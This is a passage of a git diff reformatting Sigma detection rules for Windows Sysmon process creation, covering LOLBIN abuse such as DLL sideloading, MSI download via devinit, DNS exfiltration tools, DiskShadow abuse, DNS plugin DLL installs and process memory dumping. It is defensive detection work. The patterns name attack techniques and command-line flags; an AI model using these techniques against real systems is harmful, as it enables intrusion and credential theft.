b/sigma/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml @@ -1,16 +1,12 @@ title: Potential DLL Sideloading Via DeviceEnroller.EXE id: e173ad47-4388-4012-ae62-bd13f71c18a8 related: - - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 - type: similar + - id: ee4c5d06-3abc-48cc-8885-77f1c20f4451 + type: similar status: test -description: 'Detects the use of the PhoneDeepLink parameter to potentially sideload - a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". - - Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe - using this parameter - - ' +description: | + Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". + Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter references: - https://mobile.twitter.com/0gtweet/status/1564131230941122561 - https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html @@ -29,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \deviceenroller.exe - - OriginalFileName: deviceenroller.exe + - Image|endswith: \deviceenroller.exe + - OriginalFileName: deviceenroller.exe selection_cli: - CommandLine|contains: /PhoneDeepLink + CommandLine|contains: /PhoneDeepLink condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml index 2401e4d19..f8190c0c6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml @@ -1,9 +1,7 @@ title: Arbitrary MSI Download Via Devinit.EXE id: 90d50722-0483-4065-8e35-57efaadd354d status: test -description: Detects a certain command line flag combination used by "devinit.exe", - which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows - system +description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system references: - https://twitter.com/mrd0x/status/1460815932402679809 - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/ @@ -23,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' -t msi-install ' - ' -i http' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml index ab0615d92..d4e287a19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Child Process Of ClickOnce Application id: 67bc0e75-c0a9-4cfc-8754-84a505b63c04 status: experimental -description: Detects potentially suspicious child processes of a ClickOnce deployment - application +description: Detects potentially suspicious child processes of a ClickOnce deployment application references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,6 +20,7 @@ detection: selection: ParentImage|contains: \AppData\Local\Apps\2.0\ Image|endswith: + # Add more suspicious processes - \calc.exe - \cmd.exe - \cscript.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml index 5ba11fbea..4b42d81b6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dirlister_execution.yml @@ -1,9 +1,7 @@ title: DirLister Execution id: b4dc61f5-6cce-468e-a608-b48b469feaa2 status: test -description: Detect the usage of "DirLister.exe" a utility for quickly listing folder - or drive contents. It was seen used by BlackCat ransomware to create a list of - accessible directories and files. +description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md - https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ @@ -22,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: DirLister.exe - - Image|endswith: \dirlister.exe + - OriginalFileName: DirLister.exe + - Image|endswith: \dirlister.exe condition: process_creation and selection falsepositives: - Legitimate use by users diff --git a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml index ba973e7fc..709842d2b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml @@ -1,18 +1,16 @@ title: Potentially Suspicious Child Process Of DiskShadow.EXE id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects potentially suspicious child processes of "Diskshadow.exe". This - could be an attempt to bypass parent/child relationship detection or application - whitelisting rules. +description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -37,6 +35,7 @@ detection: selection: ParentImage|endswith: \diskshadow.exe Image|endswith: + # Note: add or remove additional binaries according to your org needs - \certutil.exe - \cscript.exe - \mshta.exe @@ -47,7 +46,6 @@ detection: - \wscript.exe condition: process_creation and selection falsepositives: - - False postitve can occur in cases where admin scripts levreage the "exec" flag - to execute applications + - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml index 80c60fdf7..bf26363ff 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml @@ -1,21 +1,18 @@ title: Diskshadow Script Mode - Uncommon Script Extension Execution id: 1dde5376-a648-492e-9e54-4241dd9b0c7f related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: 'Detects execution of "Diskshadow.exe" in script mode to execute an script - with a potentially uncommon extension. - +description: | + Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required. - - ' references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -38,17 +35,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: diskshadow.exe - - Image|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - Image|endswith: \diskshadow.exe selection_flag: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' filter_main_ext: - CommandLine|contains: .txt + # Note: can be changed to an "endswith" to avoid rare FPs. But you need to account for quoted paths + # Note: Using the ".txt" is based on the MS documentation example. Best add the extension you use internally before using this rule + CommandLine|contains: .txt condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - False postitve might occur with legitimate or uncommon extensions used internally. - Initial baseline is required. + - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml index 602cef9cc..1a7e48886 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml @@ -1,17 +1,16 @@ title: Diskshadow Script Mode - Execution From Potential Suspicious Location id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 related: - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag - where the script is located in a potentially suspicious location. +description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -34,14 +33,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: diskshadow.exe - - Image|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - Image|endswith: \diskshadow.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Add additional susp paths based on your org needs - :\Temp\ - :\Windows\Temp\ - \AppData\Local\ @@ -50,7 +50,6 @@ detection: - \Users\Public\ condition: process_creation and (all of selection_*) falsepositives: - - False positives may occur if you execute the script from one of the paths mentioned - in the rule. Apply additional filters that fits your org needs. + - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml b/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml index 1963a98e8..5ef12a0dd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml @@ -1,8 +1,7 @@ title: DLL Sideloading by VMware Xfer Utility id: ebea773c-a8f1-42ad-a856-00cb221966e8 status: test -description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the - non-default directory which may be an attempt to sideload arbitrary DLL +description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \VMwareXferlogs.exe - filter: + filter: # VMware might be installed in another path so update the rule accordingly Image|startswith: C:\Program Files\VMware\ condition: process_creation and (selection and not filter) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml index 4dc06c41a..b4a011f93 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml @@ -1,9 +1,7 @@ title: Dllhost.EXE Execution Anomaly id: e7888eb1-13b0-4616-bd99-4bc0c2b054b9 status: experimental -description: Detects a "dllhost" process spawning with no commandline arguments which - is very rare to happen and could indicate process injection activity or malware - mimicking similar system processes. +description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes. references: - https://redcanary.com/blog/child-processes/ - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 @@ -24,11 +22,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \dllhost.exe - CommandLine: + CommandLine: - dllhost.exe - dllhost filter_main_null: - CommandLine: null + CommandLine: condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml index ed0789b93..baac98a38 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml @@ -20,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \iodine.exe - - Image|contains: \dnscat2 + - Image|endswith: \iodine.exe + - Image|contains: \dnscat2 condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml index 7292714c4..f91e27482 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml @@ -1,9 +1,7 @@ title: Unusual Child Process of dns.exe id: a4e3d776-f12e-42c2-8510-9e6ed1f43ec3 status: test -description: Detects an unexpected process spawning from dns.exe which may indicate - activity related to remote code execution or other forms of exploitation as seen - in CVE-2020-1350 (SigRed) +description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) references: - https://www.elastic.co/guide/en/security/current/unusual-child-process-of-dns.exe.html author: Tim Rauch diff --git a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml index efe321449..98644861e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml @@ -1,8 +1,7 @@ title: Potential Discovery Activity Via Dnscmd.EXE id: b6457d63-d2a2-4e29-859d-4e7affc153d1 status: test -description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones - of a domain. DNS zones used to host the DNS records for a particular domain. +description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records @@ -25,7 +24,7 @@ detection: selection_img: Image|endswith: \dnscmd.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - /enumrecords - /enumzones - /ZonePrint diff --git a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml index c332b6e5f..d7c8d5562 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml @@ -1,14 +1,12 @@ title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 related: - - id: e61e8a88-59a9-451c-874e-70fcc9740d67 - type: derived - - id: cbe51394-cd93-4473-b555-edf0144952d9 - type: derived + - id: e61e8a88-59a9-451c-874e-70fcc9740d67 + type: derived + - id: cbe51394-cd93-4473-b555-edf0144952d9 + type: derived status: test -description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll - parameter in registry, which can be used to execute code in context of the DNS - server (restart required) +description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html @@ -29,7 +27,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \dnscmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - /config - /serverlevelplugindll condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml index 4e2eee4d8..92cde1edb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dotnet-trace.exe - - OriginalFileName: dotnet-trace.dll + - Image|endswith: \dotnet-trace.exe + - OriginalFileName: dotnet-trace.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '-- ' - collect condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml b/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml index 8a359a677..1280f9f4b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_driverquery_recon.yml @@ -1,11 +1,10 @@ title: Potential Recon Activity Using DriverQuery.EXE id: 9fc3072c-dc8f-4bf7-b231-18950000fadd related: - - id: a20def93-0709-4eae-9bd2-31206e21e6b2 - type: similar + - id: a20def93-0709-4eae-9bd2-31206e21e6b2 + type: similar status: experimental -description: Detect usage of the "driverquery" utility to perform reconnaissance on - installed drivers +description: Detect usage of the "driverquery" utility to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ @@ -24,19 +23,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: driverquery.exe - - OriginalFileName: drvqry.exe + - Image|endswith: driverquery.exe + - OriginalFileName: drvqry.exe selection_parent: - - ParentImage|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentImage|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - ParentImage|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentImage|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Legitimate usage by some scripts might trigger this as well diff --git a/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml index 91f7294c2..94df9cfbb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_driverquery_usage.yml @@ -1,11 +1,10 @@ title: DriverQuery.EXE Execution id: a20def93-0709-4eae-9bd2-31206e21e6b2 related: - - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd - type: similar + - id: 9fc3072c-dc8f-4bf7-b231-18950000fadd + type: similar status: experimental -description: Detect usage of the "driverquery" utility. Which can be used to perform - reconnaissance on installed drivers +description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers references: - https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ @@ -24,21 +23,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: driverquery.exe - - OriginalFileName: drvqry.exe - filter_main_other: - - ParentImage|endswith: - - \cscript.exe - - \mshta.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - ParentImage|contains: - - \AppData\Local\ - - \Users\Public\ - - \Windows\Temp\ + - Image|endswith: driverquery.exe + - OriginalFileName: drvqry.exe + filter_main_other: # These are covered in 9fc3072c-dc8f-4bf7-b231-18950000fadd to avoid duplicate alerting + - ParentImage|endswith: + - \cscript.exe + - \mshta.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - ParentImage|contains: + - \AppData\Local\ + - \Users\Public\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Legitimate use by third party tools in order to investigate installed drivers -level: medium +level: medium # Level could be reduced to low if this utility is often used in your environment ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml b/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml index 653f7d72e..fc1a3791f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml @@ -20,12 +20,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - Image|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_flag: - CommandLine|contains: ' /G ' + CommandLine|contains: ' /G ' selection_permissions: - CommandLine|contains: + CommandLine|contains: # Add more permissions as you see fit in your environment - GR - GE - GW diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml b/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml index 64118a021..3b88064a2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dsacls.exe - - OriginalFileName: DSACLS.EXE + - Image|endswith: \dsacls.exe + - OriginalFileName: DSACLS.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '/user:' - '/passwd:' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml b/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml index cd7ed64ff..dc261b192 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsim_remove.yml @@ -1,8 +1,7 @@ title: Dism Remove Online Package id: 43e32da2-fdd0-4156-90de-50dfd62636f9 status: test -description: Deployment Image Servicing and Management tool. DISM is used to enumerate, - install, uninstall, configure, and update features and packages in Windows images +description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html @@ -25,11 +24,19 @@ detection: ParentCommandLine|contains|all: - /Online - /Disable-Feature + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet selection_dism: Image|endswith: \Dism.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Online - /Disable-Feature + # - '/FeatureName:' + # - '/Remove' + # /NoRestart + # /quiet condition: process_creation and (1 of selection_*) falsepositives: - Legitimate script diff --git a/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml index fb8a1d2e8..2437945f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml @@ -1,10 +1,10 @@ title: Domain Trust Discovery Via Dsquery id: 3bad990e-4848-4a78-9530-b427d854aac0 related: - - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b - type: similar - - id: 77815820-246c-47b8-9741-e0def3f57308 - type: obsoletes + - id: b23fcb74-b1cb-4ff7-a31d-bfe2a7ba453b + type: similar + - id: 77815820-246c-47b8-9741-e0def3f57308 + type: obsoletes status: test description: Detects execution of "dsquery.exe" for domain trust discovery references: @@ -25,10 +25,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dsquery.exe - - OriginalFileName: dsquery.exe + - Image|endswith: \dsquery.exe + - OriginalFileName: dsquery.exe selection_cli: - CommandLine|contains: trustedDomain + CommandLine|contains: trustedDomain condition: process_creation and (all of selection_*) falsepositives: - Legitimate use of the utilities by legitimate user for legitimate reason diff --git a/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml index 7670005ec..952d53cec 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml @@ -1,8 +1,7 @@ title: Suspicious Kernel Dump Using Dtrace id: 7124aebe-4cd7-4ccb-8df0-6d6b93c96795 status: test -description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, - which is available on Windows systems since Windows 10 19H1 +description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1 references: - https://twitter.com/0gtweet/status/1474899714290208777?s=12 - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace @@ -21,9 +20,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_plain: Image|endswith: \dtrace.exe - CommandLine|contains: lkd(0) + CommandLine|contains: lkd(0) selection_obfuscated: - CommandLine|contains|all: + CommandLine|contains|all: - syscall:::return - lkd( condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml index eac09ea47..d15fe0f70 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml @@ -1,8 +1,7 @@ title: DumpMinitool Execution id: dee0a7a3-f200-4112-a99b-952196d81e42 status: experimental -description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of - process memory via the use of the "MiniDumpWriteDump" +description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump" references: - https://twitter.com/mrd0x/status/1511415432888131586 - https://twitter.com/mrd0x/status/1511489821247684615 @@ -24,16 +23,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - Image|endswith: + - \DumpMinitool.exe + - \DumpMinitool.x86.exe + - \DumpMinitool.arm64.exe + - OriginalFileName: + - DumpMinitool.exe + - DumpMinitool.x86.exe + - DumpMinitool.arm64.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' Full' - ' Mini' - ' WithHeap' diff --git a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml index 1f38d5ecf..1ea8b93ea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml @@ -22,29 +22,28 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \DumpMinitool.exe - - \DumpMinitool.x86.exe - - \DumpMinitool.arm64.exe - - OriginalFileName: - - DumpMinitool.exe - - DumpMinitool.x86.exe - - DumpMinitool.arm64.exe + - Image|endswith: + - 